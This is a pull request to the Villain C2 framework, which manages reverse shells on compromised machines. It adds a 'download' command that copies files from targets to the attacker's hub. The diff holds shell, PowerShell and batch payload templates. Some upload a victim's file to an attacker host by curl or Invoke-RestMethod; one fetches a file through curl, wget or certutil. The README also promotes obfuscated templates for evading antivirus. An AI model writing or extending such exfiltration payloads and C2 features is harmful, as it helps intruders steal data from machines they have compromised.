### PR TITLE
Added Download capability

### DIFF
--- a/Core/Utilities/Shell/download/http/src.bat
+++ b/Core/Utilities/Shell/download/http/src.bat
@@ -1,0 +1,1 @@
+(curl.exe -s *SRC* --show-error -o *DEST* || wget.exe -q *SRC* -O *DEST* || certutil.exe -urlcache -split -f *SRC* *DEST*) && echo Success! || echo Download failed.

--- a/Core/Utilities/Shell/download/http/src.ps1
+++ b/Core/Utilities/Shell/download/http/src.ps1
@@ -1,0 +1,4 @@
+try {
+    $headers = @{"Destination-Path" = "*DEST*"}
+    IRM -Uri "http://*LHOST*:*LPORT*/*TICKET*" -Method Post -InFile "*SRC*" -ContentType "application/octet-stream" -Headers $headers
+} catch {echo $_}

--- a/Core/Utilities/Shell/download/http/src.sh
+++ b/Core/Utilities/Shell/download/http/src.sh
@@ -1,0 +1,1 @@
+src="*SRC*"; url="http://*LHOST*:*LPORT*/*TICKET*"; ((curl -s $src -o $url || wget -q $src -O $url) && echo U3VjY2VzcyEK | base64 -d) || echo Q29tbWFuZCBmYWlsZWQuCg== | base64 -d

--- a/Core/Utilities/Shell/download/http/src.sh
+++ b/Core/Utilities/Shell/download/http/src.sh
@@ -1,1 +1,1 @@
-src="*SRC*"; url="http://*LHOST*:*LPORT*/*TICKET*"; ((curl -s $src -o $url || wget -q $src -O $url) && echo U3VjY2VzcyEK | base64 -d) || echo Q29tbWFuZCBmYWlsZWQuCg== | base64 -d
+src="*SRC*"; url="http://*LHOST*:*LPORT*/*TICKET*";dest="*DEST*"; ticket="*TICKET*"; ((curl -s -H "Destination-Path: $dest" -H "Ticket: $ticket" -F "file=@$src" $url) && echo U3VjY2VzcyEK | base64 -d) || echo Q29tbWFuZCBmYWlsZWQuCg== | base64 -d

--- a/Core/common.py
+++ b/Core/common.py
@@ -489,6 +489,18 @@ Note that, if the thread limiter reaches 0, weird things will start happening as
 			'max_args' : 0
 		},
 
+		'download' : {
+			'details' : f'''
+Download files from an active shell session over http (auto-requested from the http-file-smuggler service). The feature SHOULD work regardless if the session is owned by you or a sibling server(but doesn't). 
+
+From an active pseudo shell prompt:
+download <REMOTE_FILE_PATH> <LOCAL_FILE_PATH>''',
+			'least_args' : 3,
+			'max_args' : 3,
+			'shell' : True
+		},
+
+
 		'upload' : {
 			'details' : f'''
 Upload files into an active shell session over http (auto-requested from the http-file-smuggler service). The feature works regardless if the session is owned by you or a sibling server. 

--- a/Core/settings.py
+++ b/Core/settings.py
@@ -62,7 +62,8 @@ class Hoaxshell_Settings:
 class File_Smuggler_Settings:
 	
 	bind_address = '0.0.0.0'
-	bind_port = 8888	
+	bind_port = 8888
+	receive_port = 8889	
 
 
 

--- a/README.md
+++ b/README.md
@@ -1,4 +1,5 @@
-# Villain
+# Villain (Download added)
+
 [![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/) 
 <img src="https://img.shields.io/badge/PowerShell-%E2%89%A5%20v3.0-blue">
 <img src="https://img.shields.io/badge/Developed%20on-kali%20linux-blueviolet">
@@ -11,7 +12,7 @@ Villain is a high-level Stage 0/1 C2 framework that can handle multiple reverse 
 The framework's main features include:
  - Payload generation based on default, customizable and/or user defined payload templates (Windows & Linux),
  - A dynamically engaged pseudo-shell prompt that can quickly swift between shell sessions,
- - File uploads (via http),
+ - File uploads (via http), AND NOW DOWNLOADS
  - Fileless execution of scripts against active sessions,
  - Auto-invoke ConPtyShell against a powershell r-shell session as a new process to gain a fully interactive Windows shell,
  - Multiplayer mode,
@@ -65,7 +66,11 @@ You should run as root:
 ```
 villain [-h] [-p PORT] [-x HOAX_PORT] [-n NETCAT_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-u] [-q] 
 ```
-
+Sample Upload/Download commands:
+```
+upload /home/kali/Windows/rvs.ps1 rvs2.ps1
+download .\winpeas.bat /home/kali/winpeas.bat
+```
 Check out the [Usage Guide](https://github.com/t3l3machus/Villain/blob/main/Usage_Guide.md) for more.  
 
 :warning: Create your own obfuscated reverse shell templates and replace the default ones in your instance of Villain to better handle AV evasion. Here's how 📽️ -> [youtube.com/watch?v=grSBdZdUya0](https://www.youtube.com/watch?v=grSBdZdUya0)

--- a/Villain.py
+++ b/Villain.py
@@ -47,9 +47,10 @@ if Hoaxshell_Settings.ssl_support:
 Core_Server_Settings.bind_port = args.port if args.port else Core_Server_Settings.bind_port
 TCP_Sock_Handler_Settings.bind_port = args.reverse_tcp_port if args.reverse_tcp_port else TCP_Sock_Handler_Settings.bind_port
 File_Smuggler_Settings.bind_port = args.file_smuggler_port if args.file_smuggler_port else File_Smuggler_Settings.bind_port
+File_Smuggler_Settings.receive_port = args.file_smuggler_port if args.file_smuggler_port else File_Smuggler_Settings.receive_port
 
 # Check if there are port number conflicts
-defined_ports = [Core_Server_Settings.bind_port, TCP_Sock_Handler_Settings.bind_port, File_Smuggler_Settings.bind_port]
+defined_ports = [Core_Server_Settings.bind_port, TCP_Sock_Handler_Settings.bind_port, File_Smuggler_Settings.bind_port, File_Smuggler_Settings.receive_port]
 
 if Hoaxshell_Settings.ssl_support:
 	defined_ports.append(Hoaxshell_Settings.bind_port_ssl)
@@ -163,7 +164,7 @@ class Completer(object):
 		self.main_prompt_commands = clone_dict_keys(PrompHelp.commands)
 		self.main_command_arguments = ['payload', 'lhost', 'obfuscate', 'encode', 'constraint_mode', \
 		'exec_outfile', 'domain']
-		self.pseudo_shell_commands = ['upload', 'cmdinspector', 'inject']
+		self.pseudo_shell_commands = ['upload', 'download', 'cmdinspector', 'inject']
 		self.payload_templates_root = os.path.dirname(os.path.abspath(__file__)) + f'{os.sep}Core{os.sep}payload_templates'
 	
 	
@@ -406,7 +407,7 @@ class Completer(object):
 		
 		# Autocomplete paths
 		
-		elif (main_cmd in ['inject', 'upload']) and (line_buffer_list_len > 1) and (line_buffer_list[-1][0] in [os.sep, "~"]):
+		elif (main_cmd in ['inject', 'upload','download']) and (line_buffer_list_len > 1) and (line_buffer_list[-1][0] in [os.sep, "~"]):
 			
 			root = os.sep if (line_buffer_list[-1][0] == os.sep) else os.path.expanduser('~')
 			search_term = line_buffer_list[-1] if (line_buffer_list[-1][0] != '~') else line_buffer_list[-1].replace('~', os.sep)
@@ -1014,6 +1015,46 @@ def main():
 
 					print_columns(thread_names)
 
+				elif cmd == 'download':
+				
+					Main_prompt.ready = False
+					file_url = cmd_list[1]
+					dest_path = os.path.expanduser(cmd_list[2])
+					session_id = sessions_manager.alias_to_session_id(cmd_list[3])
+				
+					if not session_id:
+						print('Failed to interpret session_id.')
+						Main_prompt.ready = True
+						continue
+				
+					sessions_check = Sessions_Manager.sessions_check(session_id)
+				
+					if sessions_check[0]:
+				
+						# Check if any sibling server has an active pseudo shell on that session
+						shell_occupied = core.is_shell_session_occupied(session_id)
+				
+						if not shell_occupied:
+							# Check who is the owner of the shell session
+							session_owner_id = sessions_manager.return_session_attr_value(session_id, 'Owner')
+				
+							if session_owner_id == core.return_server_uniq_id():
+								File_Smuggler.download_file(file_url, dest_path, session_id)
+							else:
+								core.send_receive_one_encrypted(session_owner_id, [file_url, dest_path, session_id], 'download_file')
+				
+						else:
+							print(f'\r[{INFO}] The session is currently being used by a sibling server.')
+							Main_prompt.ready = True
+							continue
+				
+						# Reset prompt if session status is Undefined or Lost
+						if Sessions_Manager.active_sessions[session_id]['Status'] in ['Undefined', 'Lost']:
+							Main_prompt.ready = True
+				
+					else:
+						print(sessions_check[1])
+						Main_prompt.ready = True
 
 				elif cmd == 'upload':
 


### PR DESCRIPTION
Added a secure "download" command for injection into Linux (.sh) & Windows (.ps1) to download files from the target machine to the C2 hub (but not siblings at this stage).  

Sample Download command:

download .\winpeas.bat /home/kali/winpeas.bat
